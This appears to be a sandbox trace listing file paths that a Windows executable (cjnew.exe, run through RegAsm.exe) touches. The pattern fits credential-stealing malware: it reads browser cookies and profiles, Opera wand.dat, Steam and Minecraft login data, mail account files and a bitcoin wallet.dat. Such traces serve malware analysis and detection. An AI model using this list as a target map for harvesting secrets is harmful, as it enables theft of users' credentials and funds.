C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.tmp
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.0.cs
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.dll
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.out
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.err
C:\Users\Seven01\AppData\Local\Temp\s2jlyttp.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\cjnew.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Users\Seven01\cjnew.exe
C:\Users\Seven01\cjnew.exe:Zone.Identifier
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC2813057F32DC41CFAF28AA7F3A2477F5.TMP
C:\Users\Seven01\AppData\Local\Temp\RES1B34.tmp
C:\Windows\System32\tzres.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.INI
C:\Windows\System32\l_intl.nls
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\5cae93d923c8378370758489e5535820\System.Runtime.Remoting.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Runtime.Remoting\2.0.0.0__b77a5c561934e089\System.Runtime.Remoting.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en.nlp
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\uxtheme.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\Phulli.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\Phulli.resources\Phulli.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\Phulli.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\Phulli.resources\Phulli.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\Phulli.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\Phulli.resources\Phulli.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\Phulli.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\Phulli.resources\Phulli.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll
C:\Users\Seven01\AppData\Local\GDIPFONTCACHEV1.DAT
C:\Windows\Fonts\ahronbd.ttf
C:\Windows\Fonts\tahoma.ttf
C:\Windows\Fonts\msjh.ttf
C:\Windows\Fonts\msyh.ttf
C:\Windows\Fonts\malgun.ttf
C:\Windows\Fonts\micross.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Users\Seven01\AppData\Roaming\pid.txt
C:\Users\Seven01\AppData\Roaming\pidloc.txt
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\wminet_utils.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\oleaut32.dll
C:\Users\Seven01\AppData\Local\Temp\26
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\*
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@abmr[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adform[1].txt
C:\Users\Seven01\AppData\Local\Temp\28
C:\Users\Seven01\AppData\Local\Temp\
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adnxs[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@agkn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@atemda[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@bing[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@bluekai[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@c.bing[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@c1.microsoft[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@casalemedia[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@creativecdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@doubleclick[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@dpm.demdex[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@exelator[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ibillboard[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ih.adscale[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@liverail[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mathtag[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@microsoft[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@mythings[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@nexac[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@onetag-sys[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@openx[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@pixel.rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@quantserve[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rfihub[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rlcdn[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@ru4[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@rubiconproject[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tapad[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tim[2].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@track.adform[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@tubemogul[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@uk-ox-d.openxadexchange[1].txt
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\seven01@www.microsoftstore[2].txt
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\Profiles
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ntdll.dll
C:\Program Files (x86)\Steam\config\SteamAppData.vdf
C:\Program Files (x86)\Steam\ClientRegistry.blob
C:\Windows\Microsoft.NET\Framework\v2.0.50727\OLEAUT32.dll
C:\Users\Seven01\AppData\Local\Temp\holdermail.txt
C:\Users\Seven01\AppData\Roaming\jagex_cache\regPin\SEVEN05-PC_Pin0.jpeg
C:\Users\Seven01\AppData\Roaming\.minecraft\lastlogin
C:\Windows\Microsoft.NET\Framework\v2.0.50727\VERSION.dll
C:\Users\Seven01\AppData\Local\Temp\holderwb.txt
C:\Windows\Microsoft.NET\Framework\v2.0.50727\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.PDB
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.pdb
C:\Windows\symbols\exe\RegAsm.pdb
C:\Windows\exe\RegAsm.pdb
C:\Windows\RegAsm.pdb
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb
C:\Windows\symbols\dll\mscorlib.pdb
C:\Windows\dll\mscorlib.pdb
C:\Windows\mscorlib.pdb
C:\Users\Seven01\AppData\Roaming\bitcoin\wallet.dat
C:\Users\Seven01\AppData\Local\Temp\wallet.dat
C:\Windows\sysnative\wbem\WmiPrvSE.exe
\??\PIPE\samr
C:\Windows\sysnative\wbem\repository
C:\Windows\sysnative\wbem\Logs
C:\Windows\sysnative\wbem\AutoRecover
C:\Windows\sysnative\wbem\MOF
C:\Windows\sysnative\wbem\repository\INDEX.BTR
C:\Windows\sysnative\wbem\repository\WRITABLE.TST
C:\Windows\sysnative\wbem\repository\MAPPING1.MAP
C:\Windows\sysnative\wbem\repository\MAPPING2.MAP
C:\Windows\sysnative\wbem\repository\MAPPING3.MAP
C:\Windows\sysnative\wbem\repository\OBJECTS.DATA
C:\Windows\sysnative\wbem\repository\WBEM9xUpgd.dat
\??\pipe\PIPE_EVENTROOT\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER
\??\pipe\PIPE_EVENTROOT\CIMV2PROVIDERSUBSYSTEM
C:\Windows\sysnative\Branding\basebrd\basebrd.dll
C:\Windows\Branding\Basebrd\basebrd.dll
C:
C:\Windows\sysnative\tzres.dll
\??\PIPE\wkssvc
\??\PIPE\srvsvc
C:\DosDevices\pipe\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc_lng.ini
C:\Users\Seven01\AppData\Roaming\Mozilla\Profiles
C:\Users\Seven01\AppData\Roaming\Thunderbird\Profiles
C:\Program Files (x86)\Mozilla Thunderbird
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.cfg
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\*.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\account{31EC9AD6-5786-45DA-B15D-2E72FE116045}.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\account{52DB1739-8CA0-4C99-9EE7-FE81B5E5749E}.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\account{B6C15F72-0649-41DF-9EB7-057A27B89428}.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\Backup\*.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\Backup\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\Backup\new\*.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\Backup\new\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\Stationery\*.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Mail\Stationery\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows Live Mail\*.oeaccount
C:\Users\Seven01\AppData\Local\Microsoft\Windows Live Mail\*.*
C:\Users\Seven01\AppData\Local\Temp\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Cookies\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Cookies\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\History\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\History\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\History\History.IE5\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\History\History.IE5\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\4DXYBRDC\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\4DXYBRDC\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\K0BMY8DM\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\K0BMY8DM\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\NSXL8QLO\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\NSXL8QLO\*.*
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\PAJSDO3I\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\acrord32_sbx\Temporary Internet Files\Content.IE5\PAJSDO3I\*.*
C:\Users\Seven01\AppData\Local\Temp\hsperfdata_Seven01\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\hsperfdata_Seven01\*.*
C:\Users\Seven01\AppData\Local\Temp\Low\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\Low\*.*
C:\Users\Seven01\AppData\Local\Temp\Microsoft Visual C++ 2010  x64 Redistributable Setup_10.0.40219\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\Microsoft Visual C++ 2010  x64 Redistributable Setup_10.0.40219\*.*
C:\Users\Seven01\AppData\Local\Temp\Microsoft Visual C++ 2010  x86 Redistributable Setup_10.0.40219\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\Microsoft Visual C++ 2010  x86 Redistributable Setup_10.0.40219\*.*
C:\Users\Seven01\AppData\Local\Temp\outlook logging\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\outlook logging\*.*
C:\Users\Seven01\AppData\Local\Temp\VBE\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\VBE\*.*
C:\Users\Seven01\AppData\Local\Temp\WPDNSE\*.oeaccount
C:\Users\Seven01\AppData\Local\Temp\WPDNSE\*.*
C:\Windows\System32\it-IT\werui.dll.mui
C:\Windows\System32\werui.dll
C:\Windows\System32\it-IT\DUser.dll.mui
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e
C:\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_it-it_e4c79be92250cb6e\Comctl32.dll.mui
C:\Windows\Fonts\staticcache.dat
C:\Windows\win.ini
C:\Windows\System32\uxtheme.dll.Config
C:\Windows\System32\uxtheme.dll
C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2
C:\Windows\System32\it-IT\erofflps.txt
C:\Users\Seven01\AppData\Local\Temp\WERECE6.tmp
C:\Users\Seven01\AppData\Local\Temp\WERECE6.tmp.WERInternalMetadata.xml
C:\Windows\System32\drivers\*.mrk
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\*_*_*_*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_regasm.exe_26c1486297e3eea26f83223995694632d438b796_03fd2a78
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WER\ReportArchive\AppCrash_regasm.exe_26c1486297e3eea26f83223995694632d438b796_03fd2a78\Report.wer
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016040520160406\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016040520160406\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016040820160409\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012016040820160409\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\Low\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\Low\History.IE5\*.*
C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
C:\Users\Seven01\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat
C:\Users\Seven01\AppData\Roaming\Mozilla\Profiles\*.*
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\Profiles\*.*
C:\Users\Seven01\AppData\Local\Mozilla\Firefox\Profiles\*.*
C:\Users\Seven01\AppData\Roaming\Mozilla\Firefox\profiles.ini
C:\Users\Seven01\AppData\Roaming\Mozilla\SeaMonkey\Profiles\*.*
C:\Users\Seven01\AppData\Local\Mozilla\SeaMonkey\Profiles\*.*
C:\Users\Seven01\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini
C:\Program Files (x86)\Sea Monkey\nss3.dll
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\*.*
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\*.*
C:\Users\Seven01\AppData\Roaming\Apple Computer\Preferences\keychain.plist
C:\Users\Seven01\AppData\Roaming\Opera\Opera\wand.dat
C:\Users\Seven01\AppData\Roaming\Opera\Opera7\profile\wand.dat
C:\Users\Seven01\AppData\Roaming\Opera\*.*
C:\Windows\Temp
